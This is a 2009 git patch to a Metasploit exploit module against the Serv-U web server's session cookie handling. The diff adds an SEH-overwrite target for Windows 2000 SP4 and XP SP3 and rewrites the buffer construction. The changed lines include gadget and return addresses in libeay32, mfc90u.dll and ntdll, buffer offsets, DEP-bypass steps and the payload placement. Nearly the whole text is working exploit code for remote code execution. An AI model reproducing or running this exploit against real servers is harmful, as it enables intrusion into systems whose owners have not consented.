From b54a7aa1d3cf23a22ebee6b68916d78f45dddf33 Mon Sep 17 00:00:00 2001 From: Joshua Drake Date: Sat, 21 Nov 2009 17:44:09 +0000 Subject: [PATCH] confirmed SEH target works on Windows XP SP3 git-svn-id: file:///home/svn/framework3/trunk@7576 4d416f70-5f16-0410-b530-b9f4589650da --- .../windows/http/servu_session_cookie.rb | 27 +++++++++---------- 1 file changed, 13 insertions(+), 14 deletions(-) diff --git a/modules/exploits/windows/http/servu_session_cookie.rb b/modules/exploits/windows/http/servu_session_cookie.rb index a3caff000c..6a31317cd5 100644 --- a/modules/exploits/windows/http/servu_session_cookie.rb +++ b/modules/exploits/windows/http/servu_session_cookie.rb @@ -13,7 +13,8 @@ require 'msf/core' class Metasploit3 < Msf::Exploit::Remote - include Msf::Exploit::Remote::Tcp + include Msf::Exploit::Remote::Tcp + include Msf::Exploit::Remote::Seh def initialize(info = {}) super(update_info(info, @@ -53,20 +54,18 @@ class Metasploit3 < Msf::Exploit::Remote [ [ 'Windows 2003 SP2 English (NX)', { - 'OS' => '2003SP2', 'FixESP' => 0x0fb02849, # add esp, 0x40c / ret @libeay32 'FixESI' => 0x78a31e96, # pop esi / ret @mfc90u.dll 'FixEBP' => 0x78a4ae99, # push esp / pop ebp / ret 0xc @mfc90u.dll 'Ret' => 0x78a3e987, # ret 0x20 @mfc90u.dll 'DisableNX' => 0x7c83f547, # NX Disable @ntdll.dll - 'JmpESP' => 0x78b2c753, # jmp esp @mfc90u.dll + 'JmpESP' => 0x78b2c753 # jmp esp @mfc90u.dll } ], - - [ 'Windows 2000 SP4 English', + + [ 'Windows 2000 SP4 and XP SP3 English (SEH)', { - 'OS' => '2000SP4', - 'Ret' => 0x0fb870bd, # pop pop ret @libeay32.dll + 'Ret' => 0x0fb870bd # pop pop ret @libeay32.dll } ], ], @@ -81,12 +80,11 @@ class Metasploit3 < Msf::Exploit::Remote def exploit - # hit end of stack.. sploit = Rex::Text.rand_text(1000) * 75 - if (target['OS'] =~ /2003/) + if (target.name =~ /NX/) # new SEH handler (point esp into buffer) sploit[41000,4] = [target['FixESP']].pack('V') @@ -101,12 +99,13 @@ class Metasploit3 < Msf::Exploit::Remote sploit[52+24,2] = "\xeb\x20" sploit[52+40,payload.encoded.length] = payload.encoded - elsif (target['OS'] =~ /2000/) - - sploit[41000-4,4] = "\xeb\x06\x90\x90" - sploit[41000,4] = [target['Ret']].pack("V") + else + + seh = generate_seh_record(target.ret) + sploit[40996,seh.length] = seh sploit[41004,payload.encoded.length] = payload.encoded - end + + end req = "POST / HTTP/1.1\r\n" req << "Host: #{rhost}:#{rport}\r\n"